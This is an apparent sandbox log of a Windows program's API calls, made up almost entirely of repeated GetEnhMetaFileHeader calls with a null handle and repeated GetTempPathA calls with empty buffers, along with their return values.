GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] 